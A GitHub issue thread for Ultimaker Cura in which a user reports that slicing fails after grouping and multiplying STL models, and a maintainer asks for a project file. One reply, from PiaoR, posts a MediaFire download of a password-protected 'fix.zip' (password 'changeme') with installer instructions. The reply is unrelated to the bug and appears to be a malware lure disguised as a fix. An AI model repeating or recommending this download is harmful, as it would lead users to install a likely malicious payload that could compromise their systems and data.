Ultimaker/Cura #19592: Grouped Object Slicing Failed

Fisco-G, 2024-08-28:
### Cura Version

5.8.0

### Operating System

Windows 11 Pro

### Printer

Ender 3 Neo

### Reproduction steps

1. Imported 2 STL models (a pair to print)
2. Grouped them
3. Multiplied the selected models by 3 (I need 4 pairs)
4. Arranged all in a grid
5. Sliced

### Actual results

I get an error message and the option to report a bug

### Expected results

The models should be sliced

### Add your .zip and screenshots here ⬇️

[image]

PiaoR, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

GregValiant, 2024-08-28:
Thanks for the report.
I can't reproduce this on my own.  Without a project file there isn't anything else that can be done.
Did you check the models for errors?
[image]

closed 2024-09-11 by github-actions[bot]